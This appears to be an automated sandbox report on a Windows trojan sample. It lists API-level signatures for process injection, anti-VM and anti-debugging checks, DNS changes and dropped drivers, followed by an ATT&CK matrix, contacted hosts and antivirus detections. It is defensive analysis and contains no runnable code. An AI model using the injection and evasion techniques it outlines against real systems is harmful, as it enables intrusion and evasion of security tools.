      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0040D170 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,FindNextFileA,2_2_0040D170
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0040D640 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,2_2_0040D640
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB5E38 GetSystemInfo,2_2_0BEB5E38
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
      Source: E816IBB62.dll.2.drBinary or memory string: VMware
      Source: VIP-#U4f1a#U5458#U7248.exe, VIP-#U4f1a#U5458#U7248.exe.2.drBinary or memory string: ^HGfS
      Source: E816IBB62.dll.2.drBinary or memory string: vmtoolsd.exe
      Source: E816IBB62.dll.2.drBinary or memory string: //./vmmemctl
      Source: E816IBB62.dll.2.drBinary or memory string: "SYSTEM\ControlSet001\Control\VideoVMware Physical Disk Helper ServiceVMToolsvmvss
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2075023773.0000000003942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
      Source: E816IBB62.dll.2.drBinary or memory string: c:\dg.dllvmtoolsd.exe
      Source: E816IBB62.dll.2.drBinary or memory string: SYSTEM\ControlSet001\Control\VideoVMware Physical Disk Helper Service
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CD5000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3740580081.000001E17F82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3748003041.000001E180E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: D74384FB8D2C9.exe, 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: VMWARE
      Source: E816IBB62.dll.2.drBinary or memory string: VMTools
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeAPI call chain: ExitProcess graph end nodegraph_2-87231
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeAPI call chain: ExitProcess graph end nodegraph_2-89455
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeAPI call chain: ExitProcess graph end nodegraph_2-86549
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E0900 rdtsc 2_2_6A6E0900
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A700C0C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6A700C0C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DE3C0 Sleep,GetFileAttributesA,_memset,GetCurrentDirectoryA,OutputDebugStringA,_memset,GetLastError,_sprintf,__wfopen_s,OutputDebugStringA,OutputDebugStringA,_memset,GetCurrentProcessId,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,_memset,__wfopen_s,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,2_2_6A6DE3C0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D8340 ReadProcessMemory,LoadLibraryA,GetProcAddress,ReadProcessMemory,FreeLibrary,2_2_6A6D8340
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A711C3B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_6A711C3B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A700C0C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6A700C0C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A70D159 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6A70D159
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6FD7EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6A6FD7EB

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Allocates memory in foreign processes
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory allocated: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000 protect: page execute and read and writeJump to behavior
      Contains functionality to inject threads in other processes
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E01F0 OutputDebugStringA,OutputDebugStringA,VirtualAllocEx,WriteProcessMemory,VirtualFreeEx,CloseHandle,GetModuleHandleA,GetProcAddress,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,2_2_6A6E01F0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D3430 RDTP,GetFileAttributesA,MessageBoxA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,CreateFileA,OutputDebugStringA,OutputDebugStringA,GetFileSize,_malloc,ReadFile,CloseHandle,_malloc,_memset,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,__wfopen_s,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,2_2_6A6D3430
      Found driver which could be used to inject code into processes
      Source: 22FD558C8.sys.2.drStatic PE information: Found potential injection code
      Source: D74384F.sys.2.drStatic PE information: Found potential injection code
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000 value starts with: 4D5AJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 1754000Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 2C2D000Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 2C2E000Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntOJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_0BE96404
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: GetLocaleInfoA,2_2_0BE96D4C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: GetLocaleInfoA,2_2_0BE9E594
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: GetLocaleInfoA,2_2_0BE9E548
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_0BE9650F
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: GetLocaleInfoA,GetACP,2_2_0BE9FB64
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,2_2_6A6EF35B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: GetLocaleInfoA,2_2_6A7111F0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,2_2_0044CEC4
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9CFD4 GetLocalTime,2_2_0BE9CFD4
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE96E15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,2_2_0BE96E15

      Stealing of Sensitive Information

      barindex
      Modifies the DNS server
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRegistry value created: 8.8.8.8,114.114.114.114Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRegistry value created: 8.8.8.8,114.114.114.114Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEF3958 ks_unbind,2_2_0BEF3958

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		1
      Credential API Hooking      		1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		5
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		32
      Windows Service      		1
      Access Token Manipulation      		3
      Obfuscated Files or Information      		21
      Input Capture      		4
      File and Directory Discovery      		Remote Desktop Protocol1
      Screen Capture      		2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      Service Execution      		Logon Script (Windows)32
      Windows Service      		2
      Software Packing      		Security Account Manager235
      System Information Discovery      		SMB/Windows Admin Shares1
      Credential API Hooking      		11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook511
      Process Injection      		1
      DLL Side-Loading      		NTDS561
      Security Software Discovery      		Distributed Component Object Model21
      Input Capture      		4
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion      		LSA Secrets3
      Virtualization/Sandbox Evasion      		SSHKeylogging14
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
      Masquerading      		Cached Domain Credentials2
      Process Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Modify Registry      		DCSync11
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
      Virtualization/Sandbox Evasion      		Proc Filesystem1
      Remote System Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Access Token Manipulation      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron511
      Process Injection      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569132 Sample: VIP-#U4f1a#U5458#U7248.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 29 www.wshifen.com 2->29 31 www.sogou.com 2->31 33 13 other IPs or domains 2->33 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for dropped file 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 15 other signatures 2->55 7 VIP-#U4f1a#U5458#U7248.exe 2 2->7         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 19 C:\Program Files (x86)\...\D74384FB8D2C9.exe, PE32 7->19 dropped 57 Antivirus detection for dropped file 7->57 59 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 7->59 61 Machine Learning detection for dropped file 7->61 63 5 other signatures 7->63 14 D74384FB8D2C9.exe 16 103 7->14         started        35 127.0.0.1 unknown unknown 11->35 file6 signatures7 process8 dnsIp9 37 114.114.114.114, 49722, 49730, 49784 COGENT-174US China 14->37 39 shoufeifz.qijianfz.com 119.28.131.242, 49715, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 14->39 41 13 other IPs or domains 14->41 21 C:\Windows\SysWOW64\22FD558C8.sys, PE32+ 14->21 dropped 23 C:\Windows\D74384F.sys, PE32+ 14->23 dropped 25 C:\Users\user\...\VIP-#U4f1a#U5458#U7248.exe, PE32 14->25 dropped 27 17 other malicious files 14->27 dropped 43 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 14->43 45 Modifies the DNS server 14->45 47 Sample is not signed and drops a device driver 14->47 file10 signatures11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      VIP-#U4f1a#U5458#U7248.exe53%ReversingLabsWin32.Trojan.Giant
      VIP-#U4f1a#U5458#U7248.exe100%AviraHEUR/AGEN.1315452
      VIP-#U4f1a#U5458#U7248.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll100%AviraTR/Inject.zdewt
      C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe100%AviraHEUR/AGEN.1315452
      C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll100%AviraHEUR/AGEN.1328196
      C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll100%AviraHEUR/AGEN.1328190
      C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll100%AviraHEUR/AGEN.1328190
      C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Google\D74384FB8D2C9.exe100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll100%Joe Sandbox ML
      C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll100%Joe Sandbox ML
      C:\Program Files (x86)\Google\D74384FB8D2C9.exe13%ReversingLabs
      C:\Users\user\Desktop\CFA702\AB67019A2010\346DgjhcV.dll0%ReversingLabs
      C:\Users\user\Desktop\CFA702\C39C3E72B\4509OKKGD.dll0%ReversingLabs
      C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll0%ReversingLabs
      C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll0%ReversingLabs
      C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll75%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll58%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll67%ReversingLabsWin32.Trojan.Occamy
      C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B90\C945E611y.dll7%ReversingLabs
      C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe35%ReversingLabs
      C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll54%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll5%ReversingLabs
      C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll61%ReversingLabsWin32.PUA.Presenoker
      C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dll0%ReversingLabs
      C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll85%ReversingLabsWin32.Trojan.CredentialAccess
      C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll54%ReversingLabsWin32.Trojan.Tnega
      C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll78%ReversingLabsWin32.Backdoor.Zapchast
      C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll78%ReversingLabsWin32.Backdoor.Zapchast
      C:\Windows\D74384F.sys62%ReversingLabsWin64.PUA.Creprote
      C:\Windows\SysWOW64\22FD558C8.sys62%ReversingLabsWin64.PUA.Creprote

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
